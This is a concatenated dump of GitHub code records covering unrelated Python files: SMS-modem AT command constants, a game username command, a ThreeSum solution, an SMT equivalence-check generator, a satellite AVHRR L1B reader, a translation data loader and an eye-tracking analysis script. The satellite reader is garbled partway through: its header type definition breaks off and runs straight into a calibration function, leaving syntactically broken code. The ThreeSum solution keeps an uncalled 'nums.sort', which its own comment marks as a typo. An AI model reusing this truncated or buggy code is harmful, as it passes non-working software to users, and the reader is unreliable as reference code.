'no', 'hohoho', 'augh']\n rans = rd.choice(ans)\n print(rans)\n engine1.say(q)\n engine1.say(rans)\n engine1.runAndWait()","repo_name":"Etishis/Console_Ben","sub_path":"ben.py","file_name":"ben.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74313976694","text":"AT_OK = 'OK\\r'\nAT_AT = 'AT\\r'\n\nAT_ECHO_OFF = 'ATE0\\r'\n\nAT_CMD_MODE = '+++'\n\nAT_DISABLE_INDICATIONS = 'AT+CNMI=0,0,0,0\\r'\n\nAT_SIEMENS_SMS_STORAGE = 'AT+CPMS=MT\\r'\n\nAT_ERICSSON_SMS_STORAGE = 'AT+CPMS=\"ME\",\"SM\"\\r'\nAT_ERICSSON_T630_DISABLE_INDICATIONS = 'AT+CNMI=2,0,0,0\\r'\nAT_ERICSSON_DISABLE_INDICATIONS = 'AT+CNMI=3,0,0,0\\r'\n\nAT_MANUFACTURER = 'AT+CGMI\\r'\nAT_MODEL = 'AT+CGMM\\r'\nAT_SERIALNO = 'AT+CGSN\\r'\nAT_IMSI = 'AT+CIMI\\r'\nAT_BATTERY = 'AT+CBC\\r'\nAT_SIGNAL = 'AT+CSQ\\r'\nAT_SOFTWARE = 'AT+CGMR\\r'\n\nAT_LIST = 'AT+CMGL=%s\\r'\n#AT_LIST = 'AT+CMGL=\"%s\"\\r'\n\nAT_SEND_MESSAGE = 'AT+CMGS=%s\\r'\n#AT_SEND_MESSAGE = 'AT+CMGS=\"%s\"\\r'\nAT_KEEP_LINK_OPEN = 'AT+CMMS=1\\r'\n\nAT_DELETE_MESSAGE = 'AT+CMGD=%s\\r'\n\nAT_ASCII_MODE = 'AT+CMGF=1\\r'\nAT_PDU_MODE = 'AT+CMGF=0\\r'\nAT_SET_CHARSET = 'AT+CSCS=%s\\r'\n\nAT_CHECK_LOGIN = 'AT+CPIN?\\r'\nAT_LOGIN = 'AT+CPIN=\"%s\"\\r'\nAT_READY = 'READY\\r'\n\n","repo_name":"bugnano/pysmsengine","sub_path":"pySmsEngine/at_commands.py","file_name":"at_commands.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26649881420","text":"from . import Game, decorate_command, Command, OneValueToken, none\nimport json\nimport threading\nfrom .....roots import USER_ROOT\nuser_path = USER_ROOT / \"user.json\"\n\n@decorate_command(nb_params=1)\ndef set_username(new_name, *, game: Game):\n if new_name is none:\n new_name = None\n if isinstance(new_name, OneValueToken):\n new_name = new_name.base_value\n new_name: str\n with user_path.open(\"r\") as f:\n user_data = json.load(f)\n user_data[\"username\"] = new_name\n with user_path.open(\"w\") as f:\n json.dump(user_data, f)\n threading.Thread(target=game.player.set_img).start()\n\n\nuser = Command(\"user\", subcommands={\"name\": set_username})\nusername = Command(\"username\", function=set_username)\n","repo_name":"AlphaNow37/PyCraft","sub_path":"code_src/chat/command/commands/shell/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"72867785972","text":"# Given an integer array nums, return all the triplets [nums[i], nums[j], nums[k]] such that i != j, i != k, and j != k, and nums[i] + nums[j] + nums[k] == 0.\n\n# Notice that the solution set must not contain duplicate triplets.\n\n\n# Example 1:\n\n# Input: nums = [-1,0,1,2,-1,-4]\n# Output: [[-1,-1,2],[-1,0,1]]\n# Explanation: \n# nums[0] + nums[1] + nums[2] = (-1) + 0 + 1 = 0.\n# nums[1] + nums[2] + nums[4] = 0 + 1 + (-1) = 0.\n# nums[0] + nums[3] + nums[4] = (-1) + 2 + (-1) = 0.\n# The distinct triplets are [-1,0,1] and [-1,-1,2].\n# Notice that the order of the output and the order of the triplets does not matter.\n# Example 2:\n\n# Input: nums = [0,1,1]\n# Output: []\n# Explanation: The only possible triplet does not sum up to 0.\n# Example 3:\n\n# Input: nums = [0,0,0]\n# Output: [[0,0,0]]\n# Explanation: The only possible triplet sums up to 0.\n\n\nclass Solution:\n def threeSum(self, nums: List[int]) -> List[List[int]]:\n res = [] # Initialize an empty list to store the result (lists of unique triplets).\n nums.sort # This is a typo, it should be 'nums.sort()' to sort the input list.\n\n for i, a in enumerate(nums): # Loop through the sorted list using its index and value.\n if i > 0 and a == nums[i-1]: # Check if the current value is the same as the previous one.\n continue # If it is, skip to the next iteration to avoid duplicates.\n\n l, r = i + 1, len(nums) - 1 # Initialize left and right pointers for two-sum check.\n while l < r: # While the left pointer is less than the right pointer.\n threeSum = a + nums[l] + nums[r] # Calculate the sum of the three values.\n\n if threeSum > 0:\n r -= 1 # If the sum is positive, decrement the right pointer.\n elif threeSum < 0:\n l += 1 # If the sum is negative, increment the left pointer.\n else:\n res.append([a, nums[l], nums[r]]) # If the sum is zero, add the triplet to the result list.\n l += 1 # Move the left pointer to the right.\n while nums[l] == nums[l-1] and l < r:\n l += 1 # Skip duplicate values to avoid duplicate triplets.\n\n return res # Return the list of unique triplets that sum to zero.\n\n\n ","repo_name":"XEthanLynchX/Leetcode","sub_path":"Two_pointers/ThreeSum.py","file_name":"ThreeSum.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22793699342","text":"import sys\nimport argparse\n\nclass Config(object):\n input_file1 = None\n input_file2 = None\n\n inputs_list1 = None\n inputs_list2 = None\n outputs_list1 = None\n outputs_list2 = None\n\n def __init__(self):\n self.input_file1 = None\n self.input_file2 = None\n self.inputs_list1 = None\n self.inputs_list2 = None\n self.outputs_list1 = None\n self.outputs_list2 = None\n\ndef generate_equivalence_check(config):\n\n model_1 = \"\"\n with open(config.input_file1) as f:\n model_1 = f.read()\n\n model_2 = \"\"\n with open(config.input_file2) as f:\n model_2 = f.read()\n\n inps1 = []\n inps2 = []\n\n if config.inputs_list1 != \"\":\n inps1 = config.inputs_list1.replace(\" \", \"\").split(\",\")\n\n if config.inputs_list2 != \"\":\n inps2 = config.inputs_list2.replace(\" \", \"\").split(\",\")\n\n assert(len(inps1) == len(inps2))\n\n inps = [(x1, inps2[inps1.index(x1)]) for x1 in inps1]\n\n outs1 = []\n outs2 = []\n\n if config.outputs_list1 != \"\":\n outs1 = config.outputs_list1.replace(\" \", \"\").split(\",\")\n\n if config.outputs_list2 != \"\":\n outs2 = config.outputs_list2.replace(\" \", \"\").split(\",\")\n\n assert(len(outs1) == len(outs2))\n\n outs = [(x1, outs2[outs1.index(x1)]) for x1 in outs1]\n \n\n set_vals = []\n\n init_vars_1 = []\n curr_vars_1 = []\n next_vars_1 = []\n init_1 = []\n trans_1 = []\n variables_1 = []\n\n init_vars_2 = []\n curr_vars_2 = []\n next_vars_2 = []\n init_2 = []\n trans_2 = []\n variables_2 = []\n\n (set_vals, variables_1, init_vars_1, curr_vars_1, next_vars_1, init_1, trans_1) = parse_model(model_1)\n (set_vals, variables_2, init_vars_2, curr_vars_2, next_vars_2, init_2, trans_2) = parse_model(model_2)\n\n print(\"\\n\".join(set_vals))\n\n print(\"\\n\".join([x.replace(CURR, m_1(\"\")+CURR) for x in curr_vars_1]))\n print(\"\\n\".join([x.replace(NEXT, m_1(\"\")+NEXT) for x in next_vars_1]))\n print(\"\\n\".join([x.replace(CURR, m_1(\"\")+CURR).replace(NEXT, m_1(\"\")+NEXT) for x in trans_1]))\n\n print(\"\\n\".join([x.replace(CURR, m_2(\"\")+CURR) for x in curr_vars_2]))\n print(\"\\n\".join([x.replace(NEXT, m_2(\"\")+NEXT) for x in next_vars_2]))\n print(\"\\n\".join([x.replace(CURR, m_2(\"\")+CURR).replace(NEXT, m_2(\"\")+NEXT) for x in trans_2]))\n\n pre = []\n\n for inp in inps:\n pre.append(\"(= %s %s)\"%(curr(m_1(inp[0])), curr(m_2(inp[1]))))\n\n for ous in outs:\n pre.append(\"(= %s %s)\"%(curr(m_1(ous[0])), curr(m_2(ous[1]))))\n\n for inp in inps:\n pre.append(\"(= %s %s)\"%(next(m_1(inp[0])), next(m_2(inp[1]))))\n \n pos = []\n\n for ous in outs:\n pos.append(\"(= %s %s)\"%(next(m_1(ous[0])), next(m_2(ous[1]))))\n\n\n precond = to_and(pre)\n poscond = to_and(pos)\n cond = \"(and %s (not %s))\"%(precond, poscond)\n\n print(\"(assert %s)\"%cond)\n\n print(\"(check-sat)\")\n\n return 0\n\n\nDFUN = \"declare-fun\"\nCURR = \"__CURR__\"\nNEXT = \"__NEXT__\"\nINIT = \"__AT0\"\nCOMM = \";;\"\n\ndef parse_model(model):\n setvals = []\n init_vars = []\n curr_vars = []\n next_vars = []\n init = []\n trans = []\n variables = []\n\n for line in model.split(\"\\n\"):\n if COMM in line:\n continue\n if line == \"\":\n continue\n if (\"declare-fun\" in line):\n if (CURR in line):\n curr_vars.append(line)\n var = line[line.find(DFUN)+len(DFUN)+1:line.find(\")\")-2]\n variables.append(var)\n if (NEXT in line):\n next_vars.append(line)\n if (INIT in line):\n init_vars.append(line)\n elif (\"set\" in line):\n setvals.append(line)\n else:\n if INIT in line:\n init.append(line)\n else:\n trans.append(line)\n\n return (setvals, variables, init_vars, curr_vars, next_vars, init, trans)\n\ndef to_and(lst):\n if len(lst) == 1:\n return lst[0]\n \n ret = \"(and %s %s)\"%(lst[0], lst[1])\n if len(lst) == 2:\n return ret\n\n for i in range(2,len(lst),1):\n ret = \"(and %s %s)\"%(ret, lst[i])\n\n return ret\n\ndef at(time):\n return \"__AT%s\"%time\n\ndef curr(var):\n return \"%s%s\"%(var, CURR)\n\ndef next(var):\n return \"%s%s\"%(var, NEXT)\n\ndef m_1(prefix):\n return \"%s<1>\"%prefix\n\ndef m_2(prefix):\n return \"%s<2>\"%prefix\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description='Equivalence check of two smtlib2 formulas generated by CoreIR.')\n\n parser.set_defaults(input_file1=None)\n parser.add_argument('-if1', '--input-file1', metavar='input_file1', type=str, required=True,\n help='input file 1')\n\n parser.set_defaults(input_file2=None)\n parser.add_argument('-if2', '--input-file2', metavar='input_file2', type=str, required=True,\n help='input file 2')\n \n parser.set_defaults(inputs_1=None)\n parser.add_argument('-i1', '--inputs-1', metavar='inputs_1', type=str, required=True,\n help='list of input variables for file 1')\n\n parser.set_defaults(inputs_2=None)\n parser.add_argument('-i2', '--inputs-2', metavar='inputs_2', type=str, required=True,\n help='list of input variables for file 1')\n\n parser.set_defaults(outputs_1=None)\n parser.add_argument('-o1', '--outputs-1', metavar='outputs_1', type=str, required=True,\n help='list of output variables for file 1')\n\n parser.set_defaults(outputs_2=None)\n parser.add_argument('-o2', '--outputs-2', metavar='outputs_2', type=str, required=True,\n help='list of output variables for file 1')\n \n args = parser.parse_args()\n\n config = Config()\n \n config.input_file1 = args.input_file1\n config.input_file2 = args.input_file2\n config.inputs_list1 = args.inputs_1\n config.inputs_list2 = args.inputs_2\n config.outputs_list1 = args.outputs_1\n config.outputs_list2 = args.outputs_2\n\n sys.exit(generate_equivalence_check(config))\n","repo_name":"rdaly525/coreir","sub_path":"tools/formal_verification/equivalence_checking.py","file_name":"equivalence_checking.py","file_ext":"py","file_size_in_byte":6072,"program_lang":"python","lang":"en","doc_type":"code","stars":92,"dataset":"github-code","pt":"21"} +{"seq_id":"29361003385","text":"import functools\nimport logging\nfrom datetime import datetime, timedelta\n\nimport dask.array as da\nimport numpy as np\nimport xarray as xr\nfrom dask import delayed\n\nfrom satpy import CHUNK_SIZE\nfrom satpy.readers.file_handlers import BaseFileHandler\n\nLINE_CHUNK = CHUNK_SIZE ** 2 // 2048\n\nlogger = logging.getLogger(__name__)\n\nCHANNEL_NAMES = ['1', '2', '3a', '3b', '4', '5']\n\nANGLES = ['sensor_zenith_angle',\n 'solar_zenith_angle',\n 'sun_sensor_azimuth_difference_angle']\n\nPLATFORM_NAMES = {4: 'NOAA-15',\n 2: 'NOAA-16',\n 6: 'NOAA-17',\n 7: 'NOAA-18',\n 8: 'NOAA-19',\n 11: 'Metop-B',\n 12: 'Metop-A',\n 13: 'Metop-C',\n 14: 'Metop simulator'}\n\n\ndef create_xarray(arr):\n \"\"\"Create an `xarray.DataArray`.\"\"\"\n res = xr.DataArray(arr, dims=['y', 'x'])\n return res\n\n\nclass AVHRRAAPPL1BFile(BaseFileHandler):\n \"\"\"Reader for AVHRR L1B files created from the AAPP software.\"\"\"\n\n def __init__(self, filename, filename_info, filetype_info):\n \"\"\"Initialize object information by reading the input file.\"\"\"\n super(AVHRRAAPPL1BFile, self).__init__(filename, filename_info,\n filetype_info)\n self.channels = {i: None for i in AVHRR_CHANNEL_NAMES}\n self.units = {i: 'counts' for i in AVHRR_CHANNEL_NAMES}\n\n self._data = None\n self._header = None\n self._is3b = None\n self._is3a = None\n self._shape = None\n self.area = None\n self.sensor = 'avhrr-3'\n self.read()\n\n self.active_channels = self._get_active_channels()\n\n self.platform_name = PLATFORM_NAMES.get(self._header['satid'][0], None)\n\n if self.platform_name is None:\n raise ValueError(\"Unsupported platform ID: %d\" % self.header['satid'])\n\n def _get_active_channels(self):\n status = self._get_channel_binary_status_from_header()\n return self._convert_binary_channel_status_to_activation_dict(status)\n\n def _get_channel_binary_status_from_header(self):\n status = self._header['inststat1'].item()\n change_line = self._header['statchrecnb']\n if change_line > 0:\n status |= self._header['inststat2'].item()\n return status\n\n @staticmethod\n def _convert_binary_channel_status_to_activation_dict(status):\n bits_channels = ((13, '1'),\n (12, '2'),\n (11, '3a'),\n (10, '3b'),\n (9, '4'),\n (8, '5'))\n activated = dict()\n for bit, channel_name in bits_channels:\n activated[channel_name] = bool(status >> bit & 1)\n return activated\n\n @property\n def start_time(self):\n \"\"\"Get the time of the first observation.\"\"\"\n return datetime(self._data['scnlinyr'][0], 1, 1) + timedelta(\n days=int(self._data['scnlindy'][0]) - 1,\n milliseconds=int(self._data['scnlintime'][0]))\n\n @property\n def end_time(self):\n \"\"\"Get the time of the final observation.\"\"\"\n return datetime(self._data['scnlinyr'][-1], 1, 1) + timedelta(\n days=int(self._data['scnlindy'][-1]) - 1,\n milliseconds=int(self._data['scnlintime'][-1]))\n\n def get_dataset(self, key, info):\n \"\"\"Get a dataset from the file.\"\"\"\n if key['name'] in CHANNEL_NAMES:\n if self.active_channels[key['name']]:\n dataset = self.calibrate(key)\n else:\n return None\n elif key['name'] in ['longitude', 'latitude']:\n dataset = self.navigate(key['name'])\n dataset.attrs = info\n elif key['name'] in ANGLES:\n dataset = self.get_angles(key['name'])\n else:\n raise ValueError(\"Not a supported dataset: %s\", key['name'])\n\n self._update_dataset_attributes(dataset, key, info)\n\n if not self._shape:\n self._shape = dataset.shape\n\n return dataset\n\n def _update_dataset_attributes(self, dataset, key, info):\n dataset.attrs.update({'platform_name': self.platform_name,\n 'sensor': self.sensor})\n dataset.attrs.update(key.to_dict())\n for meta_key in ('standard_name', 'units'):\n if meta_key in info:\n dataset.attrs.setdefault(meta_key, info[meta_key])\n\n def read(self):\n \"\"\"Read the data.\"\"\"\n tic = datetime.now()\n header = np.memmap(self.filename, dtype=_HEADERTYPE, mode=\"r\", shape=(1, ))\n data = np.memmap(self.filename, dtype=_SCANTYPE, offset=22016, mode=\"r\")\n\n logger.debug(\"Reading time %s\", str(datetime.now() - tic))\n\n self._header = header\n self._data = data\n\n def available_datasets(self, configured_datasets=None):\n \"\"\"Get the available datasets.\"\"\"\n for _, mda in configured_datasets:\n if mda['name'] in CHANNEL_NAMES:\n yield self.active_channels[mda['name']], mda\n else:\n yield True, mda\n\n def get_angles(self, angle_id):\n \"\"\"Get sun-satellite viewing angles.\"\"\"\n sunz, satz, azidiff = self._get_all_interpolated_angles()\n\n name_to_variable = dict(zip(ANGLES, (satz, sunz, azidiff)))\n return create_xarray(name_to_variable[angle_id])\n\n @functools.lru_cache(maxsize=10)\n def _get_all_interpolated_angles(self):\n sunz40km, satz40km, azidiff40km = self._get_tiepoint_angles_in_degrees()\n return self._interpolate_arrays(sunz40km, satz40km, azidiff40km)\n\n def _get_tiepoint_angles_in_degrees(self):\n sunz40km = self._data[\"ang\"][:, :, 0] * 1e-2\n satz40km = self._data[\"ang\"][:, :, 1] * 1e-2\n azidiff40km = self._data[\"ang\"][:, :, 2] * 1e-2\n return sunz40km, satz40km, azidiff40km\n\n def _interpolate_arrays(self, *input_arrays):\n lines = input_arrays[0].shape[0]\n try:\n interpolator = self._create_40km_interpolator(lines, *input_arrays)\n except ImportError:\n logger.warning(\"Could not interpolate, python-geotiepoints missing.\")\n output_arrays = input_arrays\n else:\n output_delayed = delayed(interpolator.interpolate, nout=3)()\n output_arrays = [da.from_delayed(out_array, (lines, 2048), in_array.dtype)\n for in_array, out_array in zip(input_arrays, output_delayed)]\n return output_arrays\n\n @staticmethod\n def _create_40km_interpolator(lines, *arrays_40km):\n from geotiepoints.interpolator import Interpolator\n cols40km = np.arange(24, 2048, 40)\n cols1km = np.arange(2048)\n rows40km = np.arange(lines)\n rows1km = np.arange(lines)\n along_track_order = 1\n cross_track_order = 3\n satint = Interpolator(\n arrays_40km, (rows40km, cols40km),\n (rows1km, cols1km), along_track_order, cross_track_order)\n return satint\n\n def navigate(self, coordinate_id):\n \"\"\"Get the longitudes and latitudes of the scene.\"\"\"\n lons, lats = self._get_all_interpolated_coordinates()\n if coordinate_id == 'longitude':\n return create_xarray(lons)\n elif coordinate_id == 'latitude':\n return create_xarray(lats)\n else:\n raise KeyError(\"Coordinate {} unknown.\".format(coordinate_id))\n\n @functools.lru_cache(maxsize=10)\n def _get_all_interpolated_coordinates(self):\n lons40km, lats40km = self._get_coordinates_in_degrees()\n return self._interpolate_arrays(lons40km, lats40km)\n\n def _get_coordinates_in_degrees(self):\n lons40km = self._data[\"pos\"][:, :, 1] * 1e-4\n lats40km = self._data[\"pos\"][:, :, 0] * 1e-4\n return lons40km, lats40km\n\n def calibrate(self,\n dataset_id,\n pre_launch_coeffs=False,\n calib_coeffs=None):\n \"\"\"Calibrate the data.\"\"\"\n if calib_coeffs is None:\n calib_coeffs = {}\n\n units = {'reflectance': '%',\n 'brightness_temperature': 'K',\n 'counts': '',\n 'radiance': 'W*m-2*sr-1*cm ?'}\n\n if dataset_id['name'] in (\"3a\", \"3b\") and self._is3b is None:\n # Is it 3a or 3b:\n self._is3a = da.bitwise_and(da.from_array(self._data['scnlinbit'],\n chunks=LINE_CHUNK), 3) == 0\n self._is3b = da.bitwise_and(da.from_array(self._data['scnlinbit'],\n chunks=LINE_CHUNK), 3) == 1\n\n try:\n vis_idx = ['1', '2', '3a'].index(dataset_id['name'])\n ir_idx = None\n except ValueError:\n vis_idx = None\n ir_idx = ['3b', '4', '5'].index(dataset_id['name'])\n\n mask = True\n if vis_idx is not None:\n coeffs = calib_coeffs.get('ch' + dataset_id['name'])\n if dataset_id['name'] == '3a':\n mask = self._is3a[:, None]\n ds = create_xarray(\n _vis_calibrate(self._data,\n vis_idx,\n dataset_id['calibration'],\n pre_launch_coeffs,\n coeffs,\n mask=mask))\n else:\n if dataset_id['name'] == '3b':\n mask = self._is3b[:, None]\n ds = create_xarray(\n _ir_calibrate(self._header,\n self._data,\n ir_idx,\n dataset_id['calibration'],\n mask=mask))\n\n ds.attrs['units'] = units[dataset_id['calibration']]\n ds.attrs.update(dataset_id._asdict())\n return ds\n\n\nAVHRR_CHANNEL_NAMES = (\"1\", \"2\", \"3a\", \"3b\", \"4\", \"5\")\n\n# AAPP 1b header\n\n_HEADERTYPE = np.dtype([(\"siteid\", \"S3\"),\n (\"blank\", \"S1\"),\n (\"l1bversnb\", \" 0.0\n return da.where(mask, rad, np.nan)\n\n # Central wavenumber:\n cwnum = header['radtempcnv'][0, irchn, 0]\n if irchn == 0:\n cwnum = cwnum / 1.0e2\n else:\n cwnum = cwnum / 1.0e3\n\n bandcor_2 = header['radtempcnv'][0, irchn, 1] / 1e5\n bandcor_3 = header['radtempcnv'][0, irchn, 2] / 1e6\n\n ir_const_1 = 1.1910659e-5\n ir_const_2 = 1.438833\n\n t_planck = (ir_const_2 * cwnum) / \\\n np.log(1 + ir_const_1 * cwnum * cwnum * cwnum / rad)\n\n # Band corrections applied to t_planck to get correct\n # brightness temperature for channel:\n if bandcor_2 < 0: # Post AAPP-v4\n tb_ = bandcor_2 + bandcor_3 * t_planck\n else: # AAPP 1 to 4\n tb_ = (t_planck - bandcor_2) / bandcor_3\n\n # Mask unnaturally low values\n\n return da.where(mask, tb_, np.nan)\n","repo_name":"Mervolt/pp","sub_path":"venv/Lib/site-packages/satpy/readers/aapp_l1b.py","file_name":"aapp_l1b.py","file_ext":"py","file_size_in_byte":22114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29629591904","text":"from .data_loader import DataLoader as DataLoaderBase\nfrom .data_loader import Data\nfrom typing import NamedTuple\n\nimport pandas as pd\nimport tensorflow as tf\nfrom sklearn.model_selection import train_test_split\nfrom ..preprocessor.base import PreprocessorBase\nfrom ..preprocessor.english import EngPreprocessor\nfrom ..preprocessor.german import GerPreprocessor\nfrom ..preprocessor.korean import KorPreprocessor\n\nOOV_TOKEN = \"\"\nlogger = tf.get_logger()\n\nkeras = tf.keras\n\n\nclass DataLoader(DataLoaderBase):\n def __init__(self, *args, **kwargs):\n # super(DataLoader, self).__init__(*args, **kwargs)\n\n num_words = kwargs.get(\"num_words\", None)\n maxlen = kwargs.get(\"maxlen\", None)\n deu = kwargs.get(\"deu\", None)\n n_data = kwargs.get(\"n_data\", None)\n validation_split = kwargs.get(\"validation_split\", None)\n\n self.maxlen = maxlen\n self.deu = deu\n self.num_words = num_words\n logger.info(\"Initializing Dataloader\")\n self.preprocessor = NamedTuple(\n \"Preprocessor\", [(\"ori\", PreprocessorBase), (\"tar\", PreprocessorBase)]\n )\n self.preprocessor.ori = EngPreprocessor()\n if deu:\n self.preprocessor.tar = GerPreprocessor()\n else:\n self.preprocessor.tar = KorPreprocessor()\n\n self.data_path = args[0]\n self.n_data = n_data\n self.test_size = validation_split\n self.data_train = None\n self.data_test = None\n self.ori_vocab_size = None\n self.tar_vocab_size = None\n\n self.tokenizer = keras.preprocessing.text.Tokenizer(\n num_words=num_words, filters=\"\", lower=True, split=\" \", oov_token=OOV_TOKEN\n )\n\n self.build()\n\n def _load_data(self):\n logger.info(f\"Loading data from {self.data_path}\")\n _data = []\n if self.deu:\n with open(self.data_path, \"r\", encoding=\"utf8\") as f:\n for line in f:\n line = line.split(\"\\t\")\n ori = self.preprocessor.ori.preprocess(line[0])\n tar = self.preprocessor.tar.preprocess(line[1])\n _data.append([ori, tar])\n if self.n_data:\n if self.n_data == len(_data):\n break\n else:\n data = pd.read_excel(self.data_path, sheet_name=\"Sheet1\")\n for idx, row in data.iterrows():\n en = row[\"en\"]\n ko = row[\"ko\"]\n\n en = self.preprocessor.ori.preprocess(en)\n ko = self.preprocessor.tar.preprocess(ko)\n\n _data.append([en, ko])\n\n if self.n_data:\n if self.n_data == len(_data):\n break\n\n _data_train, _data_test = train_test_split(\n _data, test_size=self.test_size, shuffle=False\n )\n ori_train, tar_train = zip(*_data_train)\n ori_test, tar_test = zip(*_data_test)\n\n # Main difference.\n self.tokenizer.fit_on_texts(ori_train + tar_train)\n\n ori_train = self._tokenize(ori_train, self.tokenizer, fit=False)\n tar_train = self._tokenize(tar_train, self.tokenizer, fit=False)\n\n ori_test = self._tokenize(ori_test, self.tokenizer, fit=False)\n tar_test = self._tokenize(tar_test, self.tokenizer, fit=False)\n\n self.data_train = Data(ori=ori_train, tar=tar_train)\n self.data_test = Data(ori=ori_test, tar=tar_test)\n","repo_name":"minhyeoky/machine-translation","sub_path":"src/data/data_loader_transformer.py","file_name":"data_loader_transformer.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"74733377653","text":"from typing import Dict\n\nfrom pathlib import Path\n\nimport ncempy.io as nio\n\nfrom oremda.api import operator\nfrom oremda.typing import JSONType, PortKey, RawPort\n\n\n@operator\ndef ncem_reader(\n _inputs: Dict[PortKey, RawPort], parameters: JSONType\n) -> Dict[PortKey, RawPort]:\n filename = parameters.get(\"filename\", \"\")\n\n dPath = Path(\"/data\")\n fPath = Path(filename)\n\n spectrum = nio.read(dPath / fPath)\n data = spectrum[\"data\"]\n\n outputs = {\n \"image\": RawPort(data=data),\n }\n\n return outputs\n","repo_name":"OpenChemistry/oremda","sub_path":"operators/ncem_reader/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"28607163080","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 4 14:54:05 2019\n@author: sammirc\n\"\"\"\n\nimport numpy as np\nimport scipy as sp\nimport pandas as pd\nfrom copy import deepcopy\nimport os\nimport os.path as op\nimport sys\nfrom matplotlib import pyplot as plt\nimport pickle\n\n#sys.path.insert(0, '/Users/sammi/Desktop/Experiments/DPhil/wmConfidence_eegfmri/analysis_scripts')\nsys.path.insert(0, '/home/sammirc/Desktop/DPhil/wmConfidence_eegfmri/analysis_scripts')\nfrom wmConfidence_funcs import get_subject_info_wmConfidence\n\n#sys.path.insert(0, '/Users/sammi/Desktop/Experiments/BCEyes')\nsys.path.insert(0, '/home/sammirc/Desktop/DPhil/BCEyes')\nimport BCEyes as bce\n\n\nwd = '/Users/sammi/Desktop/Experiments/DPhil/wmConfidence_eegfmri'; #laptop wd\nwd = '/home/sammirc/Desktop/DPhil/wmConfidence_eegfmri' #workstation wd\nos.chdir(wd)\n\n\nsubs = np.array(['pilot1_inside', 'pilot2_inside', 'pilot1_outside'])\n\n\nsubind = 3 #get first subject\n\nsub = dict(loc='workstation',\n id=subs[subind-1]) #get subject name for param extraction\nparam = get_subject_info_wmConfidence(sub)\n\nif op.exists(param['cleanedeyes']):\n with open(param['cleanedeyes'], 'rb') as handle:\n data = pickle.load(handle)\nelse: \n data = bce.parse_eye_data(eye_fname = param['raweyes'], block_rec=True,trial_rec = False, nblocks=8) #load the data\n \n nblocks = len(data) #get number of blocks in data\n \n #this will just nan any points that aren't possible with the screen dimensions you have (something went wrong, or tracker fritzed)\n data = bce.replace_points_outside_screen(data = data, nblocks = nblocks,\n traces_to_scan = ['lx', 'ly', 'rx', 'ry'], screen_dim = [1920, 1080],\n adjust_pupils=False)\n \n #detect blinks in the data using pupil trace, not gaze coords. uses physiological limits for pupil movement to detect blinks\n data = bce.cleanblinks_usingpupil(data = data,\n nblocks = nblocks,\n signals_to_clean = ['x', 'y'],\n eyes = ['left', 'right'])\n \n #find all nan periods in the data (eg missing due to blinks) and add to data structure\n data = bce.find_missing_periods(data = data,\n nblocks = nblocks,\n traces_to_scan = ['lp', 'rp', 'lx', 'rx', 'ly', 'ry'])\n \n #now interpolate these missing periods to clean the data\n ds = deepcopy(data) #will use this to actually see how much better the data is after cleaning\n #data = deepcopy(ds) #if you make a mistake at some point, run this line\n \n blockid = 1\n clean_traces = ['lp', 'rp', 'lx', 'rx', 'ly', 'ry']\n for block in data:\n print('cleaning data for block %02d/%02d'%(blockid,nblocks))\n for trace in clean_traces:\n block = bce.interpolateBlinks_Blocked(block,trace)\n blockid +=1\n \n import pickle\n with open(param['cleanedeyes'], 'wb') as handle:\n pickle.dump(data, handle)\n \n\n#check quality of cleaning here\n\nblockid = 0\n\nplt.figure()\nplt.plot(data[blockid]['lp'], lw = 1, color = '#238b45', label = 'left pupil cleaned')\nplt.plot(ds[blockid]['lp'], lw = 1, color = '#d7301f', label = 'left pupil raw')\nplt.legend()\nplt.title('example of blink artefact removal in pupil trace')\n\n\n#before we can epoch, lets read in the behavioural data and add it to the data structure\nbdata = pd.DataFrame.from_csv(param['behaviour'])\n\n\n\n# epoch the cleaned data\nall_trigs = sorted(np.unique(data[0]['Msg'][:,2]))\n\ncue_trigs = dict(neutral_left='trig11', neutral_right='trig12', cued_left='trig13', cued_right='trig14', neutral=['trig11','trig12'], cued=['trig13','trig14'])\n\n\ncued_cueperiod = bce.epoch(data, trigger_values = cue_trigs['cued'], traces=['lx','rx'],twin=[-0.5,1.5],srate=1000)\ncued_cueperiod = bce.apply_baseline(cued_cueperiod, traces = ['lx', 'rx'], baseline_window=[-0.2,0.0], mode='mean', baseline_shift_gaze=[960,540])\ncued_cueperiod = bce.average_eyes(cued_cueperiod, traces=['x'])\n\nneutral_cueperiod = bce.epoch(data,trigger_values=cue_trigs['neutral'],traces=['lx','rx'],twin=[-0.5,1.5],srate=1000)\nneutral_cueperiod = bce.apply_baseline(neutral_cueperiod,traces=['lx','rx'],baseline_window=[-0.2,0.0], mode='mean', baseline_shift_gaze=[960,540])\nneutral_cueperiod = bce.average_eyes(neutral_cueperiod, traces = ['x'])\n\ntwin_srate = np.multiply([cued_cueperiod['info']['tmin'],cued_cueperiod['info']['tmax']],cued_cueperiod['info']['srate']).astype(int)\ntimerange = np.divide(np.arange(twin_srate[0],twin_srate[1],1,dtype=float),cued_cueperiod['info']['srate'])\n\n#plot just raw x coordinates, average across trials, evoked by valid retrocues\nplt.figure()\nplt.plot(timerange, np.subtract(np.nanmean(cued_cueperiod['ave_x'][cued_cueperiod['info']['trigger']==cue_trigs['cued_left'],],0),960),label='cued left', lw=1,color='#fc8d59')\nplt.plot(timerange, np.subtract(np.nanmean(cued_cueperiod['ave_x'][cued_cueperiod['info']['trigger']==cue_trigs['cued_right'],],0),960),label='cued right', lw=1,color='#91bfdb')\nplt.plot(timerange, 